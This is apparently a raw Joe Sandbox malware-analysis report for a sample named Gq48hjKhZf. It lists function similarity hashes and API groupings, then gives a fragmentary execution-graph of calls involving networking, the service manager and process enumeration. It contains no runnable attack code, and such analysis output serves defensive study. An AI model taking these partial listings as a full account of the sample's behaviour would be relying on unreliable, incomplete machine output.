                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 458812214-0
                                      • Opcode ID: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
                                      • Instruction ID: 37a7c27cb33ea643b241ae4d06e82751f63dd7a6f22fff0809f2f79c8fcd043f
                                      • Opcode Fuzzy Hash: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
                                      • Instruction Fuzzy Hash: 5E21FD76204B0081EB06DB12E8943E973A4FB8CBC4F988126EB8D477B9DF39C906C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                      • String ID:
                                      • API String ID: 3171405041-0
                                      • Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                      • Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
                                      • Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                      • Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CriticalSection$AllocHeap$EnterInitializeLeave
                                      • String ID:
                                      • API String ID: 2544007295-0
                                      • Opcode ID: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                      • Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
                                      • Opcode Fuzzy Hash: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                      • Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: memset$memmove
                                      • String ID:
                                      • API String ID: 3527438329-0
                                      • Opcode ID: 8107c39c5f27bec561d5988f97495eada5f2ca3110369e4a1c4afdd5d8af0edf
                                      • Instruction ID: a94d66f0502d68e3f48ed78985175dce6facf9e9c189752d3e598d0e8768336a
                                      • Opcode Fuzzy Hash: 8107c39c5f27bec561d5988f97495eada5f2ca3110369e4a1c4afdd5d8af0edf
                                      • Instruction Fuzzy Hash: 2231F1B271064081FB16DA2BF4507ED6752E7DDBD0F848126EB1A87BAACE3EC542C740
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $ $header crc mismatch
                                      • API String ID: 0-4092041874
                                      • Opcode ID: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
                                      • Instruction ID: 7b7c0dcb7b367ac831aed03830ec8ef67ea91f0dce79e30e5349fd19ccede3bc
                                      • Opcode Fuzzy Hash: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
                                      • Instruction Fuzzy Hash: F6B1A4726002D48BE7A79B16C488BAE3BEAFB4CB94F164518FB854B3E1D775C940C740
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Heapwcsncpy$AllocFree
                                      • String ID:
                                      • API String ID: 1479455602-0
                                      • Opcode ID: 444aac35c6e92cb2e2b44cb887a84ba67d794b8c0e1605a2e872cde5a09e483e
                                      • Instruction ID: b6b9e846c04cb6e9a04139aff3d7e83eda40acee9614ff25bed0c888bce5a2ba
                                      • Opcode Fuzzy Hash: 444aac35c6e92cb2e2b44cb887a84ba67d794b8c0e1605a2e872cde5a09e483e
                                      • Instruction Fuzzy Hash: 3651B2B2B0068485EA66DF26A404BEA77E1F789BD4F588125EF5D477E5EB3CC542C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: memmove
                                      • String ID: $ $invalid stored block lengths
                                      • API String ID: 2162964266-1718185709
                                      • Opcode ID: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
                                      • Instruction ID: c92309fc0d38d6234d0408f55a04ce57e81ba093b92e9b8f78a366b710634dd8
                                      • Opcode Fuzzy Hash: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
                                      • Instruction Fuzzy Hash: F041AC726107A09BE7668F26C4847AD3BA9F70C7C4F215129FF4A4BBA4D735D890CB40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: EntryFunctionLookup$UnwindVirtual
                                      • String ID:
                                      • API String ID: 3286588846-0
                                      • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                      • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
                                      • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                      • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CharLower
                                      • String ID:
                                      • API String ID: 1615517891-0
                                      • Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                      • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
                                      • Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                      • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidemalloc
                                      • String ID:
                                      • API String ID: 2735977093-0
                                      • Opcode ID: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
                                      • Instruction ID: eb7332db7f165f027367f4732026c4c5e1ffc84dd66e6814e4cbb0aaa670ffe8
                                      • Opcode Fuzzy Hash: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
                                      • Instruction Fuzzy Hash: 2C216532208B8086D725CF16B44079AB7A5F7887E4F488725FF9917BA5DF79C551C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: FolderFreeFromListLocationPathTaskwcslen
                                      • String ID:
                                      • API String ID: 4012708801-0
                                      • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                      • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
                                      • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                      • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocCriticalHeapSection$EnterLeave
                                      • String ID:
                                      • API String ID: 830345296-0
                                      • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                      • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
                                      • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                      • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                       • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocHeapmemsetwcscpywcslen
                                      • String ID:
                                      • API String ID: 1807340688-0
                                      • Opcode ID: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
                                      • Instruction ID: 6743f53f77a36836f55a7605488c5dfe466d4e7a0e85049e430ca513693cbf19
                                      • Opcode Fuzzy Hash: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
                                      • Instruction Fuzzy Hash: 6D3109B5605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518350
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Heap$Free$Alloc
                                      • String ID:
                                      • API String ID: 3901518246-0
                                      • Opcode ID: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
                                      • Instruction ID: 5bc8d6a19ab5820ea12ddcb4c1614eb0e390fbda2a9c6e8bfd6285e08278190a
                                      • Opcode Fuzzy Hash: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
                                      • Instruction Fuzzy Hash: B73142B2211B409BE702DF13EA807A977A4F788BC0F448429EB4847B65DF79E4A6C740
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocCriticalHeapSection$EnterLeave
                                      • String ID:
                                      • API String ID: 830345296-0
                                      • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                      • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
                                      • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                      • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidemalloc
                                      • String ID:
                                      • API String ID: 2735977093-0
                                      • Opcode ID: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
                                      • Instruction ID: 40dc39d6401ac23dbbf15f28fc1e93d87451d781889f5abbfcb2521dceb51717
                                      • Opcode Fuzzy Hash: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
                                      • Instruction Fuzzy Hash: 3A118F3260878086EB25CF66B41076ABBA5FB8CBE4F544328EF9D57BA5DF39C4118704
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CriticalFreeHeapSection$EnterLeave
                                      • String ID:
                                      • API String ID: 1298188129-0
                                      • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                      • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
                                      • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                      • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                      • String ID:
                                      • API String ID: 4254243056-0
                                      • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                      • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
                                      • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                      • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740

                                      Execution Graph

                                      Execution Coverage:3.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:6.9%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:58
library calls 86130->86242 86131->86127 86140 40912b 86131->86140 86133->86137 86234 408e80 VariantClear 86133->86234 86243 45e737 90 API calls 3 library calls 86135->86243 86141 408f40 VariantClear 86137->86141 86142 403e10 53 API calls 86140->86142 86140->86145 86141->86145 86143 40914b 86142->86143 86144 408f40 VariantClear 86143->86144 86144->86145 86145->85919 86245 408d90 86146->86245 86148 429778 86290 410c60 VariantClear ctype 86148->86290 86150 429780 86151 408cf9 86151->86148 86152 42976c 86151->86152 86154 408d2d 86151->86154 86289 45e737 90 API calls 3 library calls 86152->86289 86261 403d10 86154->86261 86157 408d71 ctype 86157->85919 86158 408f40 VariantClear 86159 408d45 ctype 86158->86159 86159->86157 86159->86158 86161 40d15f 86160->86161 86163 425c87 86160->86163 86161->85919 86162 425cc7 86163->86162 86164 425ca1 TranslateAcceleratorW 86163->86164 86164->86161 86166 42602f 86165->86166 86169 40d17f 86165->86169 86166->85919 86167 42608e IsDialogMessageW 86168 40d18c 86167->86168 86167->86169 86168->85919 86169->86167 86169->86168 87343 430c46 GetClassLongW 86169->87343 86171->85919 86172->85868 86173->85874 86174->85919 86175->85919 86176->85919 86177->85925 86178->85925 86179->85925 86180->85925 86181->85925 86182->85925 86184 443d51 86183->86184 86185 443d33 _wcslen 86183->86185 87345 433ee0 CreateToolhelp32Snapshot Process32FirstW 86184->87345 86185->86184 86188 443d41 86185->86188 86187 443d59 86187->85925 87344 433d9e 63 API calls 4 library calls 86188->87344 86190 443d49 86190->85925 86191->85925 86193 403cdf 86192->86193 86194 408f40 VariantClear 86193->86194 86195 403ce7 86194->86195 86195->85912 86196->85925 86197->85925 86198->85919 86199->85865 86200->86039 86202 453439 86201->86202 86203 453419 86201->86203 86202->86043 86204 45342f 86203->86204 86226 4531b1 85 API calls 5 library calls 86203->86226 86204->86043 86206 453425 86206->86043 86207->86049 86208->86051 86210 46fe66 86209->86210 86211 46fe41 86209->86211 86210->86057 86212 
46fe59 86211->86212 86227 40e1c0 VariantClear ctype 86211->86227 86212->86057 86214->86042 86216 401b16 _wcslen 86215->86216 86217 4115d7 52 API calls 86216->86217 86220 401b63 86216->86220 86218 401b4b _memmove 86217->86218 86219 4115d7 52 API calls 86218->86219 86219->86220 86220->86056 86221->86081 86222->86082 86223->86042 86226->86206 86227->86211 86228->86089 86229->86093 86230->86109 86231->86110 86232->86098 86233->86114 86234->86137 86235->86114 86236->86145 86237->86114 86238->86145 86239->86129 86240->86145 86241->86130 86242->86145 86243->86145 86244->86123 86246 4289d2 86245->86246 86247 408db3 86245->86247 86295 45e737 90 API calls 3 library calls 86246->86295 86291 40bec0 86247->86291 86250 408dc9 86251 4289e5 86250->86251 86253 40ba10 52 API calls 86250->86253 86254 428a05 86250->86254 86256 40a780 387 API calls 86250->86256 86257 408e64 86250->86257 86259 408f40 VariantClear 86250->86259 86260 408e5a 86250->86260 86296 45e737 90 API calls 3 library calls 86251->86296 86253->86250 86255 408f40 VariantClear 86254->86255 86255->86260 86256->86250 86258 408f40 VariantClear 86257->86258 86258->86260 86259->86250 86260->86151 86262 408f40 VariantClear 86261->86262 86263 403d20 86262->86263 86264 403cd0 VariantClear 86263->86264 86265 403d4d 86264->86265 86298 4755ad 86265->86298 86301 45c8c1 86265->86301 86308 46d402 86265->86308 86327 46d1a6 86265->86327 86337 432fee OpenSCManagerW 86265->86337 86344 45e17d 86265->86344 86354 45cc7a 86265->86354 86368 4589fe 86265->86368 86378 47b1db 86265->86378 86385 46e91c 86265->86385 86388 45a3fe 86265->86388 86391 45c8fc 86265->86391 86398 457e3f 86265->86398 86409 46cef3 86265->86409 86451 47ac6d 86265->86451 86466 46beb2 86265->86466 86539 46f993 86265->86539 86578 40d3b0 86265->86578 86585 467897 86265->86585 86627 476d8d GetCursorPos GetForegroundWindow 86265->86627 86645 4653c8 86265->86645 86663 4589ac WSAStartup 86265->86663 86266 403d76 86266->86148 86266->86159 86289->86148 86290->86150 86292 40bed0 
86291->86292 86293 40bef2 86292->86293 86297 45e737 90 API calls 3 library calls 86292->86297 86293->86250 86295->86251 86296->86254 86297->86293 86667 475077 86298->86667 86300 4755c0 86300->86266 86302 45340c 85 API calls 86301->86302 86303 45c8d2 86302->86303 86795 4335cd 86303->86795 86305 45c8d8 86306 45c8e8 86305->86306 86307 408f40 VariantClear 86305->86307 86306->86266 86307->86306 86813 40d370 86308->86813 86311 4533eb 85 API calls 86312 46d422 86311->86312 86818 45f645 WideCharToMultiByte 86312->86818 86314 46d429 gethostbyname 86315 46d437 WSAGetLastError 86314->86315 86316 46d469 _memmove 86314->86316 86317 46d44c 86315->86317 86318 46d47a inet_ntoa 86316->86318 86328 46d1bd 86327->86328 86867 4680ed 86328->86867 86330 46d1cb 86331 46d1d9 send 86330->86331 86332 408f40 VariantClear 86331->86332 86333 46d1ee 86332->86333 86334 46d223 86333->86334 86335 46d1fa WSAGetLastError 86333->86335 86334->86266 86336 46d218 86335->86336 86336->86266 86338 433004 LockServiceDatabase 86337->86338 86339 43303a 86337->86339 86340 433024 GetLastError 86338->86340 86341 43300f UnlockServiceDatabase CloseServiceHandle 86338->86341 86339->86266 86342 433033 CloseServiceHandle 86340->86342 86343 433031 86340->86343 86341->86266 86342->86339 86343->86342 86345 45e198 86344->86345 86346 45e19c 86345->86346 86347 45e1b8 86345->86347 86348 408f40 VariantClear 86346->86348 86349 45e1cc 86347->86349 86350 45e1db FindClose 86347->86350 86351 45e1a4 86348->86351 86352 45e1d9 ctype 86349->86352 86872 44ae3e 86349->86872 86350->86352 86351->86266 86352->86266 86355 45ccd7 86354->86355 86357 45cc91 86354->86357 86356 45340c 85 API calls 86355->86356 86356->86357 86358 45340c 85 API calls 86357->86358 86359 45ccf8 86358->86359 86885 433a13 GetFileVersionInfoSizeW 86359->86885 86361 45ccfe 86362 45cd05 86361->86362 86363 45cc98 86361->86363 86364 40e710 53 API calls 86362->86364 86366 40e710 53 API calls 86363->86366 86365 45cd13 86364->86365 86365->86266 86367 45ccbc 86366->86367 
